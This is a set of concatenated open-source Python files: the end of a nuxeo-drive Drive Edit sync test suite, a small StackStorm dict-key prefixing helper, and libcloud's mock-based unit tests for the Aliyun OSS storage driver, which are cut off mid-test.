                          'Content updated from local sync root.')
        # Update locally edited file
        time.sleep(OS_STAT_MTIME_RESOLUTION)
        local.update_content('/%s/test.odt' % LOCALLY_EDITED_FOLDER_NAME,
                             'Content updated from Locally Edited.')
        self._sync(syn, wait_for_async=False)
        self.assertEquals(remote.get_content('/test.odt'),
                          'Content updated from Locally Edited.')
        self._sync(syn)
        self.assertEquals(local.get_content('/%s/test.odt'
                                            % self.workspace_title),
                          'Content updated from Locally Edited.')
        # Update file in remote sync root
        remote.update_content('/test.odt',
                              'Content updated from remote sync root.')
        self._sync(syn)
        self.assertEquals(local.get_content('/%s/test.odt'
                                            % self.workspace_title),
                          'Content updated from remote sync root.')
        self.assertEquals(local.get_content('/%s/test.odt'
                                            % LOCALLY_EDITED_FOLDER_NAME),
                          'Content updated from remote sync root.')

    def test_drive_edit_remote_move_non_sync_root_to_sync_root(self):
        # The body below is unreachable until the SkipTest is removed.
        raise SkipTest("WIP in https://jira.nuxeo.com/browse/NXDRIVE-184")
        ctl = self.controller_1
        ctl.bind_server(self.local_nxdrive_folder_1, self.nuxeo_url,
                        self.user_1, self.password_1)
        local = LocalClient(self.local_nxdrive_folder_1)
        remote = self.remote_document_client_1
        syn = ctl.synchronizer
        # Create file in test workspace (non sync root)
        doc_id = remote.make_file('/', 'test.odt', 'Some content.')
        # Drive edit file
        ctl.download_edit(self.nuxeo_url, 'default', doc_id, 'test.odt',
                          open_file=False)
        # Check file is downloaded to the Locally Edited folder
        self.assertTrue(local.exists('/%s/test.odt'
                                     % LOCALLY_EDITED_FOLDER_NAME))
        # Update locally edited file
        # Let's first sync because of https://jira.nuxeo.com/browse/NXDRIVE-144
        self._sync(syn)
        time.sleep(OS_STAT_MTIME_RESOLUTION)
        local.update_content('/%s/test.odt' % LOCALLY_EDITED_FOLDER_NAME,
                             'Updated content.')
        self._sync(syn, wait_for_async=False)
        self.assertEquals(remote.get_content('/test.odt'), 'Updated content.')
        # Register a folder as sync root and remotely move file to it
        sync_root_id = remote.make_folder('/', 'syncRoot')
        ctl.bind_root(self.local_nxdrive_folder_1, sync_root_id)
        self._sync(syn)
        self.assertTrue(local.exists('/syncRoot'))
        remote.move('/test.odt', '/syncRoot')
        self._sync(syn)
        self.assertTrue(local.exists('/%s/test.odt'
                                     % LOCALLY_EDITED_FOLDER_NAME))
        self.assertTrue(local.exists('/syncRoot/test.odt'))

    def test_drive_edit_remote_move_sync_root_to_non_sync_root(self):
        # The body below is unreachable until the SkipTest is removed.
        raise SkipTest("WIP in https://jira.nuxeo.com/browse/NXDRIVE-170")
        ctl = self.controller_1
        ctl.bind_server(self.local_nxdrive_folder_1, self.nuxeo_url,
                        self.user_1, self.password_1)
        local = LocalClient(self.local_nxdrive_folder_1)
        remote = self.remote_document_client_1
        syn = ctl.synchronizer
        # Create folder, register it as a sync root and create file inside it
        sync_root_id = remote.make_folder('/', 'syncRoot')
        ctl.bind_root(self.local_nxdrive_folder_1, sync_root_id)
        doc_id = remote.make_file(sync_root_id, 'test.odt', 'Some content.')
        # Launch first synchronization
        self._sync(syn)
        self.assertTrue(local.exists('/syncRoot/test.odt'))
        # Drive edit file
        ctl.download_edit(self.nuxeo_url, 'default', doc_id, 'test.odt',
                          open_file=False)
        # Check file is downloaded to the Locally Edited folder
        self.assertTrue(local.exists('/%s/test.odt'
                                     % LOCALLY_EDITED_FOLDER_NAME))
        # Update locally edited file
        # Let's first sync because of https://jira.nuxeo.com/browse/NXDRIVE-144
        self._sync(syn)
        time.sleep(OS_STAT_MTIME_RESOLUTION)
        local.update_content('/%s/test.odt' % LOCALLY_EDITED_FOLDER_NAME,
                             'Content updated from Locally Edited.')
        self._sync(syn, wait_for_async=False)
        self.assertEquals(remote.get_content('/syncRoot/test.odt'),
                          'Content updated from Locally Edited.')
        self._sync(syn)
        self.assertEquals(local.get_content('/syncRoot/test.odt'),
                          'Content updated from Locally Edited.')
        # Move file to non sync root workspace
        remote.move('/syncRoot/test.odt', self.workspace)
        self._sync(syn)
        self.assertFalse(local.exists('/syncRoot/test.odt'))
        self.assertTrue(local.exists('/%s/test.odt'
                                     % LOCALLY_EDITED_FOLDER_NAME))
        self.assertEquals(len(local.get_children_info('/%s'
                                                      % LOCALLY_EDITED_FOLDER_NAME)), 1)

    def test_drive_edit_move_sync_root_to_sync_root(self):
        # The body below is unreachable until the SkipTest is removed.
        raise SkipTest("WIP in https://jira.nuxeo.com/browse/NXDRIVE-170")
        ctl = self.controller_1
        ctl.bind_server(self.local_nxdrive_folder_1, self.nuxeo_url,
                        self.user_1, self.password_1)
        local = LocalClient(self.local_nxdrive_folder_1)
        remote = self.remote_document_client_1
        syn = ctl.synchronizer
        # Create 2 folders, register them as sync roots and create file inside first folder
        sync_root_id1 = remote.make_folder('/', 'syncRoot1')
        sync_root_id2 = remote.make_folder('/', 'syncRoot2')
        ctl.bind_root(self.local_nxdrive_folder_1, sync_root_id1)
        ctl.bind_root(self.local_nxdrive_folder_1, sync_root_id2)
        doc_id = remote.make_file(sync_root_id1, 'test.odt', 'Some content.')
        # Launch first synchronization
        self._sync(syn)
        self.assertTrue(local.exists('/syncRoot1/test.odt'))
        self.assertTrue(local.exists('/syncRoot2'))
        # Drive edit file
        ctl.download_edit(self.nuxeo_url, 'default', doc_id, 'test.odt',
                          open_file=False)
        # Check file is downloaded to the Locally Edited folder
        self.assertTrue(local.exists('/%s/test.odt'
                                     % LOCALLY_EDITED_FOLDER_NAME))
        # Update locally edited file
        # Let's first sync because of https://jira.nuxeo.com/browse/NXDRIVE-144
        self._sync(syn)
        time.sleep(OS_STAT_MTIME_RESOLUTION)
        local.update_content('/%s/test.odt' % LOCALLY_EDITED_FOLDER_NAME,
                             'Content updated from Locally Edited.')
        self._sync(syn, wait_for_async=False)
        self.assertEquals(remote.get_content('/syncRoot1/test.odt'),
                          'Content updated from Locally Edited.')
        self._sync(syn)
        self.assertEquals(local.get_content('/syncRoot1/test.odt'),
                          'Content updated from Locally Edited.')
        # Remotely move file to other sync root
        remote.move('/syncRoot1/test.odt', '/syncRoot2')
        self._sync(syn)
        self.assertFalse(local.exists('/syncRoot1/test.odt'))
        self.assertTrue(local.exists('/syncRoot2/test.odt'))
        self.assertTrue(local.exists('/%s/test.odt'
                                     % LOCALLY_EDITED_FOLDER_NAME))
        self.assertEquals(len(local.get_children_info('/%s'
                                                      % LOCALLY_EDITED_FOLDER_NAME)), 1)
        # Locally move back file to other sync root
        local.move('/syncRoot2/test.odt', '/syncRoot1')
        self._sync(syn, wait_for_async=False)
        self.assertFalse(local.exists('/syncRoot2/test.odt'))
        self.assertTrue(local.exists('/syncRoot1/test.odt'))
        self.assertTrue(local.exists('/%s/test.odt'
                                     % LOCALLY_EDITED_FOLDER_NAME))
        self.assertEquals(len(local.get_children_info('/%s'
                                                      % LOCALLY_EDITED_FOLDER_NAME)), 1)

    def _sync(self, syn, wait_for_async=True):
        # Run one synchronization pass, optionally waiting for server-side
        # asynchronous processing first.
        if wait_for_async:
            self.wait()
        syn.loop(delay=0, max_loops=1)
| loopingz/nuxeo-drive | nuxeo-drive-client/nxdrive/tests/test_drive_edit.py | Python | lgpl-2.1 | 18,778 |
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
__all__ = [
'prefix_dict_keys'
]
def prefix_dict_keys(dictionary, prefix='_'):
    """
    Prefix dictionary keys with a provided prefix.

    :param dictionary: Dictionary whose keys to prefix.
    :type dictionary: ``dict``

    :param prefix: Key prefix.
    :type prefix: ``str``

    :rtype: ``dict``:
    """
    # Use the builtin dict iteration instead of six.iteritems: it behaves
    # identically on Python 2 and 3 and removes the dependency on six.
    result = {}
    for key, value in dictionary.items():
        result['%s%s' % (prefix, key)] = value
    return result
| jtopjian/st2 | st2common/st2common/util/misc.py | Python | apache-2.0 | 1,245 |
# -*- coding=utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import os
import sys
import unittest
try:
import mock
except ImportError:
from unittest import mock
from libcloud.utils.py3 import b
from libcloud.utils.py3 import httplib
from libcloud.utils.py3 import urlparse
from libcloud.utils.py3 import parse_qs
from libcloud.common.types import InvalidCredsError
from libcloud.storage.base import Container, Object
from libcloud.storage.types import ContainerDoesNotExistError
from libcloud.storage.types import ContainerError
from libcloud.storage.types import ContainerIsNotEmptyError
from libcloud.storage.types import InvalidContainerNameError
from libcloud.storage.types import ObjectDoesNotExistError
from libcloud.storage.types import ObjectHashMismatchError
from libcloud.storage.drivers.oss import OSSConnection
from libcloud.storage.drivers.oss import OSSStorageDriver
from libcloud.storage.drivers.oss import CHUNK_SIZE
from libcloud.storage.drivers.dummy import DummyIterator
from libcloud.test import MockHttp, generate_random_data, make_response # pylint: disable-msg=E0611
from libcloud.test.file_fixtures import StorageFileFixtures # pylint: disable-msg=E0611
from libcloud.test.secrets import STORAGE_OSS_PARAMS
class OSSConnectionTestCase(unittest.TestCase):
    """Unit tests for the Aliyun OSS request-signing algorithm."""

    def setUp(self):
        # credential pair taken from the official OSS signing example
        self.conn = OSSConnection('44CF9590006BF252F707',
                                  'OtxrzxIsfpFjA7SwPzILwy8Bw21TLhquhboDYROV')
    def test_signature(self):
        # expected signature value from the OSS "Sign the request" docs
        expected = b('26NBxoKdsyly4EDv6inkoDft/yA=')
        headers = {
            'Content-MD5': 'ODBGOERFMDMzQTczRUY3NUE3NzA5QzdFNUYzMDQxNEM=',
            'Content-Type': 'text/html',
            'Expires': 'Thu, 17 Nov 2005 18:49:58 GMT',
            'X-OSS-Meta-Author': 'foo@bar.com',
            'X-OSS-Magic': 'abracadabra',
            'Host': 'oss-example.oss-cn-hangzhou.aliyuncs.com'
        }
        action = '/oss-example/nelson'
        actual = OSSConnection._get_auth_signature('PUT', headers, {},
                                                   headers['Expires'],
                                                   self.conn.key,
                                                   action,
                                                   'x-oss-')
        self.assertEqual(expected, actual)
class ObjectTestCase(unittest.TestCase):
    """Tests for the storage Object model used with the OSS driver."""

    def test_object_with_chinese_name(self):
        # Object names may contain non-ASCII characters; building the repr
        # must not raise (this exercises unicode handling on Python 2).
        driver = OSSStorageDriver(*STORAGE_OSS_PARAMS)
        obj = Object(name='中文', size=0, hash=None, extra=None,
                     meta_data=None, container=None, driver=driver)
        # use the builtin repr() and the dedicated assertion instead of
        # calling the dunder directly with a weak truthiness check
        self.assertIsNotNone(repr(obj))
class OSSMockHttp(MockHttp, unittest.TestCase):
fixtures = StorageFileFixtures('oss')
base_headers = {}
    def _unauthorized(self, method, url, body, headers):
        # Any request is answered with 401 (invalid credentials scenario).
        return (httplib.UNAUTHORIZED,
                '',
                self.base_headers,
                httplib.responses[httplib.OK])
    def _list_containers_empty(self, method, url, body, headers):
        # ListBuckets response with no buckets.
        body = self.fixtures.load('list_containers_empty.xml')
        return (httplib.OK,
                body,
                self.base_headers,
                httplib.responses[httplib.OK])
    def _list_containers(self, method, url, body, headers):
        # ListBuckets response with a fixture bucket list.
        body = self.fixtures.load('list_containers.xml')
        return (httplib.OK,
                body,
                self.base_headers,
                httplib.responses[httplib.OK])
    def _list_container_objects_empty(self, method, url, body, headers):
        # ListObjects response for an empty bucket.
        body = self.fixtures.load('list_container_objects_empty.xml')
        return (httplib.OK,
                body,
                self.base_headers,
                httplib.responses[httplib.OK])
    def _list_container_objects(self, method, url, body, headers):
        # ListObjects response with a fixture object list.
        body = self.fixtures.load('list_container_objects.xml')
        return (httplib.OK,
                body,
                self.base_headers,
                httplib.responses[httplib.OK])
    def _list_container_objects_chinese(self, method, url, body, headers):
        # ListObjects response containing non-ASCII object names.
        body = self.fixtures.load('list_container_objects_chinese.xml')
        return (httplib.OK,
                body,
                self.base_headers,
                httplib.responses[httplib.OK])
    def _list_container_objects_prefix(self, method, url, body, headers):
        # Verify the prefix filter is passed through as a query parameter.
        params = {'prefix': self.test.prefix}
        self.assertUrlContainsQueryParams(url, params)
        body = self.fixtures.load('list_container_objects_prefix.xml')
        return (httplib.OK,
                body,
                self.base_headers,
                httplib.responses[httplib.OK])
def _get_container(self, method, url, body, headers):
return self._list_containers(method, url, body, headers)
def _get_object(self, method, url, body, headers):
return self._list_containers(method, url, body, headers)
def _notexisted_get_object(self, method, url, body, headers):
return (httplib.NOT_FOUND,
body,
self.base_headers,
httplib.responses[httplib.NOT_FOUND])
def _test_get_object(self, method, url, body, headers):
self.base_headers.update(
{'accept-ranges': 'bytes',
'connection': 'keep-alive',
'content-length': '0',
'content-type': 'application/octet-stream',
'date': 'Sat, 16 Jan 2016 15:38:14 GMT',
'etag': '"D41D8CD98F00B204E9800998ECF8427E"',
'last-modified': 'Fri, 15 Jan 2016 14:43:15 GMT',
'server': 'AliyunOSS',
'x-oss-object-type': 'Normal',
'x-oss-request-id': '569A63E6257784731E3D877F',
'x-oss-meta-rabbits': 'monkeys'})
return (httplib.OK,
body,
self.base_headers,
httplib.responses[httplib.OK])
def _invalid_name(self, method, url, body, headers):
# test_create_container_bad_request
return (httplib.BAD_REQUEST,
body,
headers,
httplib.responses[httplib.OK])
def _already_exists(self, method, url, body, headers):
# test_create_container_already_existed
return (httplib.CONFLICT,
body,
headers,
httplib.responses[httplib.OK])
def _create_container(self, method, url, body, headers):
# test_create_container_success
self.assertEqual('PUT', method)
self.assertEqual('', body)
return (httplib.OK,
body,
headers,
httplib.responses[httplib.OK])
def _create_container_location(self, method, url, body, headers):
# test_create_container_success
self.assertEqual('PUT', method)
location_constraint = ('<CreateBucketConfiguration>'
'<LocationConstraint>%s</LocationConstraint>'
'</CreateBucketConfiguration>' %
self.test.ex_location)
self.assertEqual(location_constraint, body)
return (httplib.OK,
body,
headers,
httplib.responses[httplib.OK])
def _delete_container_doesnt_exist(self, method, url, body, headers):
# test_delete_container_doesnt_exist
return (httplib.NOT_FOUND,
body,
headers,
httplib.responses[httplib.OK])
def _delete_container_not_empty(self, method, url, body, headers):
# test_delete_container_not_empty
return (httplib.CONFLICT,
body,
headers,
httplib.responses[httplib.OK])
def _delete_container(self, method, url, body, headers):
return (httplib.NO_CONTENT,
body,
self.base_headers,
httplib.responses[httplib.NO_CONTENT])
def _foo_bar_object_not_found(self, method, url, body, headers):
# test_delete_object_not_found
return (httplib.NOT_FOUND,
body,
headers,
httplib.responses[httplib.OK])
def _foo_bar_object_delete(self, method, url, body, headers):
# test_delete_object
return (httplib.NO_CONTENT,
body,
headers,
httplib.responses[httplib.OK])
def _list_multipart(self, method, url, body, headers):
query_string = urlparse.urlsplit(url).query
query = parse_qs(query_string)
if 'key-marker' not in query:
body = self.fixtures.load('ex_iterate_multipart_uploads_p1.xml')
else:
body = self.fixtures.load('ex_iterate_multipart_uploads_p2.xml')
return (httplib.OK,
body,
headers,
httplib.responses[httplib.OK])
def _foo_bar_object(self, method, url, body, headers):
# test_download_object_success
body = generate_random_data(1000)
return (httplib.OK,
body,
headers,
httplib.responses[httplib.OK])
def _foo_bar_object_invalid_size(self, method, url, body, headers):
# test_upload_object_invalid_file_size
body = ''
return (httplib.OK,
body,
headers,
httplib.responses[httplib.OK])
def _foo_test_stream_data_multipart(self, method, url, body, headers):
headers = {}
body = ''
headers = {'etag': '"0cc175b9c0f1b6a831c399e269772661"'}
return (httplib.OK,
body,
headers,
httplib.responses[httplib.OK])
class OSSStorageDriverTestCase(unittest.TestCase):
    """Functional tests for OSSStorageDriver backed by OSSMockHttp.

    Each test selects the mock response by setting
    ``mock_response_klass.type`` before calling into the driver.
    """

    driver_type = OSSStorageDriver
    driver_args = STORAGE_OSS_PARAMS
    mock_response_klass = OSSMockHttp

    @classmethod
    def create_driver(self):
        return self.driver_type(*self.driver_args)

    def setUp(self):
        self.driver_type.connectionCls.conn_class = self.mock_response_klass
        self.mock_response_klass.type = None
        # Expose the running test case to the mock so its handlers can
        # read per-test attributes (self.prefix, self.ex_location, ...).
        self.mock_response_klass.test = self
        self.driver = self.create_driver()

    def tearDown(self):
        self._remove_test_file()

    def _remove_test_file(self):
        # Best-effort cleanup of the temp file written by download tests.
        file_path = os.path.abspath(__file__) + '.temp'
        try:
            os.unlink(file_path)
        except OSError:
            pass

    def test_invalid_credentials(self):
        self.mock_response_klass.type = 'unauthorized'
        self.assertRaises(InvalidCredsError, self.driver.list_containers)

    def test_list_containers_empty(self):
        self.mock_response_klass.type = 'list_containers_empty'
        containers = self.driver.list_containers()
        self.assertEqual(len(containers), 0)

    def test_list_containers_success(self):
        self.mock_response_klass.type = 'list_containers'
        containers = self.driver.list_containers()
        self.assertEqual(len(containers), 2)
        container = containers[0]
        self.assertEqual('xz02tphky6fjfiuc0', container.name)
        self.assertTrue('creation_date' in container.extra)
        self.assertEqual('2014-05-15T11:18:32.000Z',
                         container.extra['creation_date'])
        self.assertTrue('location' in container.extra)
        self.assertEqual('oss-cn-hangzhou-a', container.extra['location'])
        self.assertEqual(self.driver, container.driver)

    def test_list_container_objects_empty(self):
        self.mock_response_klass.type = 'list_container_objects_empty'
        container = Container(name='test_container', extra={},
                              driver=self.driver)
        objects = self.driver.list_container_objects(container=container)
        self.assertEqual(len(objects), 0)

    def test_list_container_objects_success(self):
        self.mock_response_klass.type = 'list_container_objects'
        container = Container(name='test_container', extra={},
                              driver=self.driver)
        objects = self.driver.list_container_objects(container=container)
        self.assertEqual(len(objects), 2)
        obj = objects[0]
        self.assertEqual(obj.name, 'en/')
        self.assertEqual(obj.hash, 'D41D8CD98F00B204E9800998ECF8427E')
        self.assertEqual(obj.size, 0)
        self.assertEqual(obj.container.name, 'test_container')
        self.assertEqual(
            obj.extra['last_modified'], '2016-01-15T14:43:15.000Z')
        self.assertTrue('owner' in obj.meta_data)

    def test_list_container_objects_with_chinese(self):
        self.mock_response_klass.type = 'list_container_objects_chinese'
        container = Container(name='test_container', extra={},
                              driver=self.driver)
        objects = self.driver.list_container_objects(container=container)
        self.assertEqual(len(objects), 2)
        obj = [o for o in objects
               if o.name == 'WEB控制台.odp'][0]
        self.assertEqual(obj.hash, '281371EA1618CF0E645D6BB90A158276')
        self.assertEqual(obj.size, 1234567)
        self.assertEqual(obj.container.name, 'test_container')
        self.assertEqual(
            obj.extra['last_modified'], '2016-01-15T14:43:06.000Z')
        self.assertTrue('owner' in obj.meta_data)

    def test_list_container_objects_with_prefix(self):
        self.mock_response_klass.type = 'list_container_objects_prefix'
        container = Container(name='test_container', extra={},
                              driver=self.driver)
        # Read back by the mock handler via self.test.prefix.
        self.prefix = 'test_prefix'
        objects = self.driver.list_container_objects(container=container,
                                                     prefix=self.prefix)
        self.assertEqual(len(objects), 2)

    def test_get_container_doesnt_exist(self):
        self.mock_response_klass.type = 'get_container'
        self.assertRaises(ContainerDoesNotExistError,
                          self.driver.get_container,
                          container_name='not-existed')

    def test_get_container_success(self):
        self.mock_response_klass.type = 'get_container'
        container = self.driver.get_container(
            container_name='xz02tphky6fjfiuc0')
        # Fixed: was assertTrue(container.name, 'xz02tphky6fjfiuc0'), which
        # treats the second argument as a failure *message* and therefore
        # passes for any truthy name.  assertEqual actually compares.
        self.assertEqual('xz02tphky6fjfiuc0', container.name)

    def test_get_object_container_doesnt_exist(self):
        self.mock_response_klass.type = 'get_object'
        self.assertRaises(ObjectDoesNotExistError,
                          self.driver.get_object,
                          container_name='xz02tphky6fjfiuc0',
                          object_name='notexisted')

    def test_get_object_success(self):
        self.mock_response_klass.type = 'get_object'
        obj = self.driver.get_object(container_name='xz02tphky6fjfiuc0',
                                     object_name='test')
        self.assertEqual(obj.name, 'test')
        self.assertEqual(obj.container.name, 'xz02tphky6fjfiuc0')
        self.assertEqual(obj.size, 0)
        self.assertEqual(obj.hash, 'D41D8CD98F00B204E9800998ECF8427E')
        self.assertEqual(obj.extra['last_modified'],
                         'Fri, 15 Jan 2016 14:43:15 GMT')
        self.assertEqual(obj.extra['content_type'], 'application/octet-stream')
        self.assertEqual(obj.meta_data['rabbits'], 'monkeys')

    def test_create_container_bad_request(self):
        # invalid container name, returns a 400 bad request
        self.mock_response_klass.type = 'invalid_name'
        self.assertRaises(ContainerError,
                          self.driver.create_container,
                          container_name='invalid_name')

    def test_create_container_already_exists(self):
        # container with this name already exists
        self.mock_response_klass.type = 'already_exists'
        self.assertRaises(InvalidContainerNameError,
                          self.driver.create_container,
                          container_name='new-container')

    def test_create_container_success(self):
        # success
        self.mock_response_klass.type = 'create_container'
        name = 'new_container'
        container = self.driver.create_container(container_name=name)
        self.assertEqual(container.name, name)

    def test_create_container_with_ex_location(self):
        self.mock_response_klass.type = 'create_container_location'
        name = 'new_container'
        # Read back by the mock handler via self.test.ex_location.
        self.ex_location = 'oss-cn-beijing'
        container = self.driver.create_container(container_name=name,
                                                 ex_location=self.ex_location)
        self.assertEqual(container.name, name)
        # Fixed: was assertTrue(value, msg), which never compared the
        # location against the expected value.
        self.assertEqual(container.extra['location'], self.ex_location)

    def test_delete_container_doesnt_exist(self):
        container = Container(name='new_container', extra=None,
                              driver=self.driver)
        self.mock_response_klass.type = 'delete_container_doesnt_exist'
        self.assertRaises(ContainerDoesNotExistError,
                          self.driver.delete_container,
                          container=container)

    def test_delete_container_not_empty(self):
        container = Container(name='new_container', extra=None,
                              driver=self.driver)
        self.mock_response_klass.type = 'delete_container_not_empty'
        self.assertRaises(ContainerIsNotEmptyError,
                          self.driver.delete_container,
                          container=container)

    def test_delete_container_success(self):
        self.mock_response_klass.type = 'delete_container'
        container = Container(name='new_container', extra=None,
                              driver=self.driver)
        self.assertTrue(self.driver.delete_container(container=container))

    def test_download_object_success(self):
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        # NOTE(review): driver=self.driver_type passes the driver *class*,
        # not the instance; kept as-is since download only goes through
        # self.driver — confirm before relying on obj.driver here.
        obj = Object(name='foo_bar_object', size=1000, hash=None, extra={},
                     container=container, meta_data=None,
                     driver=self.driver_type)
        destination_path = os.path.abspath(__file__) + '.temp'
        result = self.driver.download_object(obj=obj,
                                             destination_path=destination_path,
                                             overwrite_existing=False,
                                             delete_on_failure=True)
        self.assertTrue(result)

    def test_download_object_invalid_file_size(self):
        # Mock returns an empty body for a 1000-byte object, so the size
        # check must fail and download_object must return False.
        self.mock_response_klass.type = 'invalid_size'
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        obj = Object(name='foo_bar_object', size=1000, hash=None, extra={},
                     container=container, meta_data=None,
                     driver=self.driver_type)
        destination_path = os.path.abspath(__file__) + '.temp'
        result = self.driver.download_object(obj=obj,
                                             destination_path=destination_path,
                                             overwrite_existing=False,
                                             delete_on_failure=True)
        self.assertFalse(result)

    def test_download_object_not_found(self):
        self.mock_response_klass.type = 'not_found'
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        obj = Object(name='foo_bar_object', size=1000, hash=None, extra={},
                     container=container, meta_data=None,
                     driver=self.driver_type)
        destination_path = os.path.abspath(__file__) + '.temp'
        self.assertRaises(ObjectDoesNotExistError,
                          self.driver.download_object,
                          obj=obj,
                          destination_path=destination_path,
                          overwrite_existing=False,
                          delete_on_failure=True)

    def test_download_object_as_stream_success(self):
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        obj = Object(name='foo_bar_object', size=1000, hash=None, extra={},
                     container=container, meta_data=None,
                     driver=self.driver_type)
        stream = self.driver.download_object_as_stream(obj=obj,
                                                       chunk_size=None)
        self.assertTrue(hasattr(stream, '__iter__'))

    def test_upload_object_invalid_hash1(self):
        def upload_file(self, object_name=None, content_type=None,
                        request_path=None, request_method=None,
                        headers=None, file_path=None, stream=None):
            # Returned data_hash deliberately mismatches the etag.
            return {'response': make_response(200, headers={'etag': '2345'}),
                    'bytes_transferred': 1000,
                    'data_hash': 'hash343hhash89h932439jsaa89'}
        self.mock_response_klass.type = 'INVALID_HASH1'
        old_func = self.driver_type._upload_object
        self.driver_type._upload_object = upload_file
        file_path = os.path.abspath(__file__)
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        object_name = 'foo_test_upload'
        try:
            self.driver.upload_object(file_path=file_path, container=container,
                                      object_name=object_name,
                                      verify_hash=True)
        except ObjectHashMismatchError:
            pass
        else:
            self.fail(
                'Invalid hash was returned but an exception was not thrown')
        finally:
            self.driver_type._upload_object = old_func

    def test_upload_object_success(self):
        def upload_file(self, object_name=None, content_type=None,
                        request_path=None, request_method=None,
                        headers=None, file_path=None, stream=None):
            return {'response': make_response(200,
                    headers={'etag': '0cc175b9c0f1b6a831c399e269772661'}),
                    'bytes_transferred': 1000,
                    'data_hash': '0cc175b9c0f1b6a831c399e269772661'}
        self.mock_response_klass.type = None
        old_func = self.driver_type._upload_object
        self.driver_type._upload_object = upload_file
        file_path = os.path.abspath(__file__)
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        object_name = 'foo_test_upload'
        extra = {'meta_data': {'some-value': 'foobar'}}
        try:
            obj = self.driver.upload_object(file_path=file_path,
                                            container=container,
                                            object_name=object_name,
                                            extra=extra,
                                            verify_hash=True)
            self.assertEqual(obj.name, 'foo_test_upload')
            self.assertEqual(obj.size, 1000)
            self.assertTrue('some-value' in obj.meta_data)
        finally:
            # Always restore the monkey-patched method so an assertion
            # failure cannot leak the patch into other tests (matches
            # test_upload_object_invalid_hash1).
            self.driver_type._upload_object = old_func

    def test_upload_object_with_acl(self):
        def upload_file(self, object_name=None, content_type=None,
                        request_path=None, request_method=None,
                        headers=None, file_path=None, stream=None):
            return {'response': make_response(200, headers={'etag': '0cc175b9c0f1b6a831c399e269772661'}),
                    'bytes_transferred': 1000,
                    'data_hash': '0cc175b9c0f1b6a831c399e269772661'}
        self.mock_response_klass.type = None
        old_func = self.driver_type._upload_object
        self.driver_type._upload_object = upload_file
        file_path = os.path.abspath(__file__)
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        object_name = 'foo_test_upload'
        extra = {'acl': 'public-read'}
        try:
            obj = self.driver.upload_object(file_path=file_path,
                                            container=container,
                                            object_name=object_name,
                                            extra=extra,
                                            verify_hash=True)
            self.assertEqual(obj.name, 'foo_test_upload')
            self.assertEqual(obj.size, 1000)
            self.assertEqual(obj.extra['acl'], 'public-read')
        finally:
            # Restore the patch even on failure (see note above).
            self.driver_type._upload_object = old_func

    def test_upload_object_with_invalid_acl(self):
        file_path = os.path.abspath(__file__)
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        object_name = 'foo_test_upload'
        extra = {'acl': 'invalid-acl'}
        self.assertRaises(AttributeError,
                          self.driver.upload_object,
                          file_path=file_path,
                          container=container,
                          object_name=object_name,
                          extra=extra,
                          verify_hash=True)

    def test_upload_empty_object_via_stream(self):
        if self.driver.supports_multipart_upload:
            self.mock_response_klass.type = 'multipart'
        else:
            self.mock_response_klass.type = None
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        object_name = 'foo_test_stream_data'
        iterator = DummyIterator(data=[''])
        extra = {'content_type': 'text/plain'}
        obj = self.driver.upload_object_via_stream(container=container,
                                                   object_name=object_name,
                                                   iterator=iterator,
                                                   extra=extra)
        self.assertEqual(obj.name, object_name)
        self.assertEqual(obj.size, 0)

    def test_upload_small_object_via_stream(self):
        if self.driver.supports_multipart_upload:
            self.mock_response_klass.type = 'multipart'
        else:
            self.mock_response_klass.type = None
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        object_name = 'foo_test_stream_data'
        iterator = DummyIterator(data=['2', '3', '5'])
        extra = {'content_type': 'text/plain'}
        obj = self.driver.upload_object_via_stream(container=container,
                                                   object_name=object_name,
                                                   iterator=iterator,
                                                   extra=extra)
        self.assertEqual(obj.name, object_name)
        self.assertEqual(obj.size, 3)

    def test_upload_big_object_via_stream(self):
        if self.driver.supports_multipart_upload:
            self.mock_response_klass.type = 'multipart'
        else:
            self.mock_response_klass.type = None
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        object_name = 'foo_test_stream_data'
        # More than two full chunks forces the multipart path.
        iterator = DummyIterator(
            data=['2' * CHUNK_SIZE, '3' * CHUNK_SIZE, '5'])
        extra = {'content_type': 'text/plain'}
        obj = self.driver.upload_object_via_stream(container=container,
                                                   object_name=object_name,
                                                   iterator=iterator,
                                                   extra=extra)
        self.assertEqual(obj.name, object_name)
        self.assertEqual(obj.size, CHUNK_SIZE * 2 + 1)

    def test_upload_object_via_stream_abort(self):
        if not self.driver.supports_multipart_upload:
            return
        self.mock_response_klass.type = 'MULTIPART'

        def _faulty_iterator():
            for i in range(0, 5):
                yield str(i)
            raise RuntimeError('Error in fetching data')

        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        object_name = 'foo_test_stream_data'
        iterator = _faulty_iterator()
        extra = {'content_type': 'text/plain'}
        # The driver is expected to abort the multipart upload when the
        # source iterator blows up mid-stream.
        try:
            self.driver.upload_object_via_stream(container=container,
                                                 object_name=object_name,
                                                 iterator=iterator,
                                                 extra=extra)
        except Exception:
            pass
